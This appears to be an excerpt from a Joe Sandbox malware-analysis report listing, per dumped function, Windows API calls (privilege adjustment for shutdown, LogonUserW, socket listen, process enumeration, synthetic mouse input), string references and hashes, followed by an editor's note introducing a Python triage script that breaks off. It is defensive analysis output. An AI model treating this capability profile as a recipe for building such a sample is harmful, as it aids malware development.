                                                      • Opcode Fuzzy Hash: ec92419138fee3a896ddd1a13a2dc6f4c9cfef45a472249dda8758886ce86db2
                                                      • Instruction Fuzzy Hash: D6217F752002149FDB10AF68EC09B697BA8FF14711F10C029FA4ADB2A3EB30EC51CB55
                                                      APIs
                                                        • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                        • Part of subcall function 00864A31: GetFileAttributesW.KERNEL32(?,0086370B), ref: 00864A32
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 008638A3
                                                      • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0086394B
                                                      • MoveFileW.KERNEL32(?,?), ref: 0086395E
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0086397B
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 0086399D
                                                      • FindClose.KERNEL32(00000000,?,?,?,?), ref: 008639B9
                                                      Strings
                                                      Similarity
                                                      • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 4002782344-1173974218
                                                      • Opcode ID: e34bbb25af7b909d3df8ecc7135b4924a7d3e3a629bee270fe7b69005d28536b
                                                      • Instruction ID: 6b25ce850480e8aa8e0e5ba39cd0898a22387e1732ff58095284d8b9f8d15e5c
                                                      • Opcode Fuzzy Hash: e34bbb25af7b909d3df8ecc7135b4924a7d3e3a629bee270fe7b69005d28536b
                                                      • Instruction Fuzzy Hash: 67514D3180514DAACF05EBA8DD929EDBB79FF15304F600069E406F71A2EB316F09CB62
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0086F440
                                                      • Sleep.KERNEL32(0000000A), ref: 0086F470
                                                      • _wcscmp.LIBCMT ref: 0086F484
                                                      • _wcscmp.LIBCMT ref: 0086F49F
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0086F53D
                                                      • FindClose.KERNEL32(00000000), ref: 0086F553
                                                      Strings
                                                      Similarity
                                                      • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                      • String ID: *.*
                                                      • API String ID: 713712311-438819550
                                                      • Opcode ID: 8fa6cedf0219307591164e6309efe90df68619f8893c82eeb5fb588685ef35fb
                                                      • Instruction ID: b54060951285fb3a72e4105c27a2a701b3725724db73deeb5bf8f11621ec58da
                                                      • Opcode Fuzzy Hash: 8fa6cedf0219307591164e6309efe90df68619f8893c82eeb5fb588685ef35fb
                                                      • Instruction Fuzzy Hash: F7416C71904219AFDF14EF68EC49AEEBBB4FF05314F104466E915E2292EB30DE84CB51
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • GetSystemMetrics.USER32(0000000F), ref: 0088D47C
                                                      • GetSystemMetrics.USER32(0000000F), ref: 0088D49C
                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000), ref: 0088D6D7
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0088D6F5
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0088D716
                                                      • ShowWindow.USER32(00000003,00000000), ref: 0088D735
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0088D75A
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0088D77D
                                                      Similarity
                                                      • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                                      • String ID:
                                                      • API String ID: 830902736-0
                                                      • Opcode ID: bec3823bd31b24f0b077022a33d977da260ca89b1bcbc60ff0b1dd406e1a80f3
                                                      • Instruction ID: f1db07af3c28e6ba889f04e05b2b7142538fb32d280bc264a109cf1817897a39
                                                      • Opcode Fuzzy Hash: bec3823bd31b24f0b077022a33d977da260ca89b1bcbc60ff0b1dd406e1a80f3
                                                      • Instruction Fuzzy Hash: EEB17A71600219EFDF14EF68C985BAD7BB1FF08711F088169ED58DB295E734A990CB90
                                                      APIs
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: cf7caf17b4829385e5b060efdce534b63a084f8972f44e8e678b704bbd946663
                                                      • Instruction ID: 8c17a6aa1abcc66e8b94a90332dee193a9cbed17045e8707a82b202c7b9c4ea5
                                                      • Opcode Fuzzy Hash: cf7caf17b4829385e5b060efdce534b63a084f8972f44e8e678b704bbd946663
                                                      • Instruction Fuzzy Hash: 8D128C70A00609DFDF04DFA9D981AEEB7F9FF88300F104529E846E7291EB35A995CB51
                                                      APIs
                                                        • Part of subcall function 008587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0085882B
                                                        • Part of subcall function 008587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00858858
                                                        • Part of subcall function 008587E1: GetLastError.KERNEL32 ref: 00858865
                                                      • ExitWindowsEx.USER32(?,00000000), ref: 008651F9
                                                      Strings
                                                      Similarity
                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                      • String ID: $@$SeShutdownPrivilege
                                                      • API String ID: 2234035333-194228
                                                      • Opcode ID: 077f183d9143be1a6aec7abcd8f503aae4853b4dfde5be80ee0a2f16b0de75bf
                                                      • Instruction ID: a7d60b134eba51c72c22bb9bed333e3a7782f1834f5b51e5587f1b7245e3928e
                                                      • Opcode Fuzzy Hash: 077f183d9143be1a6aec7abcd8f503aae4853b4dfde5be80ee0a2f16b0de75bf
                                                      • Instruction Fuzzy Hash: 0F012B317916156BF728627CACABFBB7358FB05345F220421FD13E22D2DA511C008690
                                                      APIs
                                                      • socket.WS2_32(00000002,00000001,00000006), ref: 008762DC
                                                      • WSAGetLastError.WS2_32(00000000), ref: 008762EB
                                                      • bind.WS2_32(00000000,?,00000010), ref: 00876307
                                                      • listen.WS2_32(00000000,00000005), ref: 00876316
                                                      • WSAGetLastError.WS2_32(00000000), ref: 00876330
                                                      • closesocket.WS2_32(00000000), ref: 00876344
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketlistensocket
                                                      • String ID:
                                                      • API String ID: 1279440585-0
                                                      • Opcode ID: 40dc26e386fbb8b6c337db22c42852f8150e150d98174979974b3098ba23b709
                                                      • Instruction ID: 84c948961cffa5fd0bc659562d5c0aae2d684c2a8b0919fd630e8c851c8a198f
                                                      • Opcode Fuzzy Hash: 40dc26e386fbb8b6c337db22c42852f8150e150d98174979974b3098ba23b709
                                                      • Instruction Fuzzy Hash: 3F21D0706006049FDB10EF68CC45A6EBBA9FF48320F148168E95AE73D6D770ED11CB52
                                                      APIs
                                                        • Part of subcall function 00820DB6: std::exception::exception.LIBCMT ref: 00820DEC
                                                        • Part of subcall function 00820DB6: __CxxThrowException@8.LIBCMT ref: 00820E01
                                                      • _memmove.LIBCMT ref: 00850258
                                                      • _memmove.LIBCMT ref: 0085036D
                                                      • _memmove.LIBCMT ref: 00850414
                                                      Similarity
                                                      • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1300846289-0
                                                      • Opcode ID: a7168bc0816047087c17700eb7dbd7e290f5d571b587c3e9898ba4cd191ebb6a
                                                      • Instruction ID: fe7fbc4ce159b3f34406fb33bcfc77d00fd6c7679edda5011ab0bc1c309163c7
                                                      • Opcode Fuzzy Hash: a7168bc0816047087c17700eb7dbd7e290f5d571b587c3e9898ba4cd191ebb6a
                                                      • Instruction Fuzzy Hash: E002B2B0A00619DFCF04DF68D981AAE7BB5FF84304F148069E806DB395EB35D994CB96
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 008019FA
                                                      • GetSysColor.USER32(0000000F), ref: 00801A4E
                                                      • SetBkColor.GDI32(?,00000000), ref: 00801A61
                                                        • Part of subcall function 00801290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 008012D8
                                                      Similarity
                                                      • API ID: ColorDialogNtdllProc_$LongWindow
                                                      • String ID:
                                                      • API String ID: 591255283-0
                                                      APIs
                                                        • Part of subcall function 00877D8B: inet_addr.WS2_32(00000000), ref: 00877DB6
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 0087679E
                                                      • WSAGetLastError.WS2_32(00000000), ref: 008767C7
                                                      • bind.WS2_32(00000000,?,00000010), ref: 00876800
                                                      • WSAGetLastError.WS2_32(00000000), ref: 0087680D
                                                      • closesocket.WS2_32(00000000), ref: 00876821
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 99427753-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008580C0
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008580CA
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008580D9
                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 008580E0
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008580F6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 47921759-0
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 0086C432
                                                      • CoCreateInstance.OLE32(00892D6C,00000000,00000001,00892BDC,?), ref: 0086C44A
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      • CoUninitialize.OLE32 ref: 0086C6B7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                      • String ID: .lnk
                                                      • API String ID: 2683427295-24824748
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: __itow__swprintf
                                                      • String ID:
                                                      • API String ID: 674341424-0
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0087EE3D
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0087EE4B
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0087EF0B
                                                      • CloseHandle.KERNEL32(00000000), ref: 0087EF1A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                      • String ID:
                                                      • API String ID: 2576544623-0
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • GetCursorPos.USER32(?), ref: 0088C4D2
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0088C4E7
                                                      • GetCursorPos.USER32(?), ref: 0088C534
                                                      • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0083B9AB,?,?,?), ref: 0088C56E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                      • String ID:
                                                      • API String ID: 1423138444-0
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 008012D8
                                                      • GetClientRect.USER32(?,?), ref: 0083B5FB
                                                      • GetCursorPos.USER32(?), ref: 0083B605
                                                      • ScreenToClient.USER32(?,?), ref: 0083B610
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                                      • String ID:
                                                      • API String ID: 1010295502-0
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0085E628
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($|
                                                      • API String ID: 1659193697-1631851259
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0086B40B
                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0086B465
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0086B4B2
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Similarity
                                                      • API ID: ErrorMode$DiskFreeSpace
                                                      • String ID:
                                                      • API String ID: 1682464887-0
                                                      APIs
                                                        • Part of subcall function 00820DB6: std::exception::exception.LIBCMT ref: 00820DEC
                                                        • Part of subcall function 00820DB6: __CxxThrowException@8.LIBCMT ref: 00820E01
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0085882B
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00858858
                                                      • GetLastError.KERNEL32 ref: 00858865
                                                      Similarity
                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                      • String ID:
                                                      • API String ID: 1922334811-0
                                                      APIs
                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00858774
                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0085878B
                                                      • FreeSid.ADVAPI32(?), ref: 0085879B
                                                      Similarity
                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                      • String ID:
                                                      • API String ID: 3429775523-0
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                        • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                      • GetParent.USER32(?), ref: 0083B7BA
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,008019B3,?,?,?,00000006,?), ref: 0083B834
                                                      Similarity
                                                      • API ID: LongWindow$DialogNtdllParentProc_
                                                      • String ID:
                                                      • API String ID: 314495775-0
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086C6FB
                                                      • FindClose.KERNEL32(00000000), ref: 0086C72B
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0083B93A,?,?,?), ref: 0088C5F1
                                                        • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0088C5D7
                                                      Similarity
                                                      • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                      • String ID:
                                                      • API String ID: 1273190321-0
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 0088C961
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0083BA16,?,?,?,?,?), ref: 0088C98A
                                                      Similarity
                                                      • API ID: ClientDialogNtdllProc_Screen
                                                      • String ID:
                                                      • API String ID: 3420055661-0
                                                      APIs
                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00879468,?,0088FB84,?), ref: 0086A097
                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00879468,?,0088FB84,?), ref: 0086A0A9
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0088CA84
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0083B995,?,?,?,?), ref: 0088CAB2
                                                      Similarity
                                                      • API ID: DialogLongNtdllProc_Window
                                                      • String ID:
                                                      • API String ID: 2065330234-0
                                                      APIs
                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00858309), ref: 008581E0
                                                      • CloseHandle.KERNEL32(?), ref: 008581F2
                                                      Similarity
                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                      • String ID:
                                                      • API String ID: 81990902-0
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0082A15A
                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 0082A163
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 1865c2b6b6885eeb055e851f0a0b15573c89aba65cde44db68e6a83db117d6b0
                                                      • Instruction ID: 1ddf9d8b1f0b6efeb0859587e566aad4cabbdd8946e2e9b3438547630ee469bc
                                                      • Opcode Fuzzy Hash: 1865c2b6b6885eeb055e851f0a0b15573c89aba65cde44db68e6a83db117d6b0
                                                      • Instruction Fuzzy Hash: 0FB09231254308ABCA002B99EC09B883F68FB46AA2F404020F70D84262CB6258508B91
                                                      Strings
                                                      • Variable must be of type 'Object'., xrefs: 00843E62
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: same nine associated dump files as listed above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Variable must be of type 'Object'.
                                                      • API String ID: 0-109567571
                                                      • Opcode ID: 3de2b91bc3615b48bd63a70049c836ccc334196a54211396562e3e708025b0dc
                                                      • Instruction ID: d641a92d8e24dbfcfec89a9105817c11d0c3885eb7e81b0f53b0ca0f56fe85bc
                                                      • Opcode Fuzzy Hash: 3de2b91bc3615b48bd63a70049c836ccc334196a54211396562e3e708025b0dc
                                                      • Instruction Fuzzy Hash: 2BA2D074A00219CFCB64CF58C880AAEB7B2FF58314F248869E905EB391D775ED42CB91
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: same nine associated dump files as listed above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b5e6fa977b3c55e02b052f4dc7bf88585d3aaec2e3c7cd5b7484c6bb752e348a
                                                      • Instruction ID: 6607cb48d4bb659cfdb11a188b8d8209c6c79a682c5c41722e45dba70d98f236
                                                      • Opcode Fuzzy Hash: b5e6fa977b3c55e02b052f4dc7bf88585d3aaec2e3c7cd5b7484c6bb752e348a
                                                      • Instruction Fuzzy Hash: 6932E221D29F554DD723A634D822335A698FFB73D4F19D737E81AB5AA6EB28C4C38100
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: same nine associated dump files as listed above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 045992c5ddb4c489394dcc3c6b0f9803a1318a603a457f05ce1cf5c95c477505
                                                      • Instruction ID: 3c107766d4235aa3cd09100f4566fba753122c16381995604576549c6e207ce1
                                                      • Opcode Fuzzy Hash: 045992c5ddb4c489394dcc3c6b0f9803a1318a603a457f05ce1cf5c95c477505
                                                      • Instruction Fuzzy Hash: C3B1F020E2AF414DD723A6398831336BA5CBFBB2C5F55D71BFC1670E22EB2185835181
                                                      APIs
                                                      • __time64.LIBCMT ref: 0086889B
                                                        • Part of subcall function 0082520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00868F6E,00000000,?,?,?,?,0086911F,00000000,?), ref: 00825213
                                                        • Part of subcall function 0082520A: __aulldiv.LIBCMT ref: 00825233
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: same nine associated dump files as listed above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                      • String ID:
                                                      • API String ID: 2893107130-0
                                                      • Opcode ID: 0608a9b21673d2f17a13338c98272b1d03c722053b041199a426bf82ef6a3dc0
                                                      • Instruction ID: ed7dcae31f2043c1f7f73f4361685b986e75d8a806930d1171a8d63bd80bf30a
                                                      • Opcode Fuzzy Hash: 0608a9b21673d2f17a13338c98272b1d03c722053b041199a426bf82ef6a3dc0
                                                      • Instruction Fuzzy Hash: 0F21AF32625610CFC729CF29D841A52B3E1FBA5311B698F7CE1F9CB2C0DA34A905CB54
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000112,?,00000000), ref: 0088D838
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: same nine associated dump files as listed above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogLongNtdllProc_Window
                                                      • String ID:
                                                      • API String ID: 2065330234-0
                                                      • Opcode ID: e2a5f1117e63e4c7f9949507e2ec278ddfcd7d8045254317f4ad84082d179f3c
                                                      • Instruction ID: bbcdebdb4c9defd789b284b55e2404693d42d3381b7c4849b7a9e406f683b846
                                                      • Opcode Fuzzy Hash: e2a5f1117e63e4c7f9949507e2ec278ddfcd7d8045254317f4ad84082d179f3c
                                                      • Instruction Fuzzy Hash: 2511E735204315ABEB297A2CCC0AF7A3714FB41720F204734F921DA5E3CA70AD1093A5
                                                      APIs
                                                        • Part of subcall function 008025DB: GetWindowLongW.USER32(?,000000EB), ref: 008025EC
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0083B952,?,?,?,?,00000000,?), ref: 0088D432
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: same nine associated dump files as listed above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogLongNtdllProc_Window
                                                      • String ID:
                                                      • API String ID: 2065330234-0
                                                      • Opcode ID: d25c397a96b23a482f00439521428bb9afc1559f5e30e1112a83c2412ef509b9
                                                      • Instruction ID: f9c84b4ca5d939271693f798fc757df5bd735e4d76fc5e49a1838ff1b7fee246
                                                      • Opcode Fuzzy Hash: d25c397a96b23a482f00439521428bb9afc1559f5e30e1112a83c2412ef509b9
                                                      • Instruction Fuzzy Hash: 8101D831600214AFDF14AF29C849FBA3BA1FF46325F444125F9569B2D2C331BC51DBA4
                                                      APIs
                                                        • Part of subcall function 00802612: GetWindowLongW.USER32(?,000000EB), ref: 00802623
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000006,00000000,?,?,?,00801B04,?,?,?,?,?), ref: 008018E2
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: same nine associated dump files as listed above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogLongNtdllProc_Window
                                                      • String ID:
                                                      • API String ID: 2065330234-0
                                                      • Opcode ID: 121376d098c9aa48b6421c2ac9ee41619b0bd3767eff14ae9a3f305e52fbf0a2
                                                      • Instruction ID: 70363a7ad737334692b0afff10315c3f99d7f9dedc9a1de600f83a026b838a1e
                                                      • Opcode Fuzzy Hash: 121376d098c9aa48b6421c2ac9ee41619b0bd3767eff14ae9a3f305e52fbf0a2
                                                      • Instruction Fuzzy Hash: 20F03A34600619DFDF18DF58DC69E6637B2FB54360F508129F9528B2E1CB31E9A0EB50
                                                      APIs
                                                      • NtdllDialogWndProc_W.NTDLL(?,00000232,?,?), ref: 0088C8FE
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: same nine associated dump files as listed above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: DialogNtdllProc_
                                                      • String ID:
                                                      • API String ID: 3239928679-0
                                                      • Opcode ID: d16a7fa1c18c7ca3483c1dc974bd0e8a5ef7ba96d9e463ce50166d003e816e03
                                                      • Instruction ID: e52a4eabbec3a30ba7541a295dab8f8c03c8892924be26fbca1fdea390ef9df0
                                                      • Opcode Fuzzy Hash: d16a7fa1c18c7ca3483c1dc974bd0e8a5ef7ba96d9e463ce50166d003e816e03
                                                      • Instruction Fuzzy Hash: BEF06D35250254AFDF21EF98DC09FD77BA5FB09320F044028BA21A72E2CB707860E7A0
                                                      APIs
                                                      • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00864C4A
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: same nine associated dump files as listed above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: mouse_event
                                                      • String ID:
                                                      • API String ID: 2434400541-0
                                                      • Opcode ID: 72eb8a874eaa405adbc72b33772909a568846916b339fa123b2b5009577506a7
                                                      • Instruction ID: 203e22816018c36c9d3bd56c77e7fed7c62d6c8ee19f8aa487ed7423b70661f6
                                                      • Opcode Fuzzy Hash: 72eb8a874eaa405adbc72b33772909a568846916b339fa123b2b5009577506a7
                                                      • Instruction Fuzzy Hash: 7AD09EA516561D79ED1C07649E1FFBE1148F341796FD6B1497601CA2C2ECA05C446131
                                                      APIs
                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00858389), ref: 008587D1
                                                       Memory Dump Source
                                                       • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: same nine associated dump files as listed above
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: LogonUser
                                                      • String ID:
                                                      • API String ID: 1244722697-0
                                                      • Opcode ID: cb4fba25d262f14e35f2ff430f050166e3f29d71a2c2d48912ad7499f618ab1e
                                                      • Instruction ID: 872724b527e7c508dad6b61d5b21434030b5b07a853e0a4a696d755161bebbe9
                                                      • Opcode Fuzzy Hash: cb4fba25d262f14e35f2ff430f050166e3f29d71a2c2d48912ad7499f618ab1e
                                                      • Instruction Fuzzy Hash: 9AD09E3226490EAFEF019EA8DD05EAE3B69FB04B01F408511FE15D51A1C775D935AB60
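The entries in this listing record, per dumped function, which imported APIs it reaches either directly or through a "Part of subcall function" chain, plus any string cross-references. When a report runs to thousands of such entries, the practical question is which functions touch the interesting APIs (here LogonUserW, mouse_event, the exception-filter pair, and CreateProcessW reached only through subcall 0088B635 from the dialog procedure in the entry that follows). The Python below is an added example written for this page; it is not part of the Joe Sandbox report or of the analysed sample. It parses entries in exactly the bullet/"ref:" layout shown here, identifies each function by the address of its first direct call or string xref, and maps API names onto coarse capability labels. The sample text is constructed from six entries on this page with the repeated Memory Dump Source and IDA Plugin blocks cut; the capability labels and the reading of "Variable must be of type 'Object'." as an AutoIt3 runtime error string (consistent with the compiled-AutoIt verdict in the report header) are the editor's, not Joe Sandbox's.

```python
"""Triage helper for the per-function API listing of a Joe Sandbox report.

Added example: parses entries in the format shown on this page and maps the
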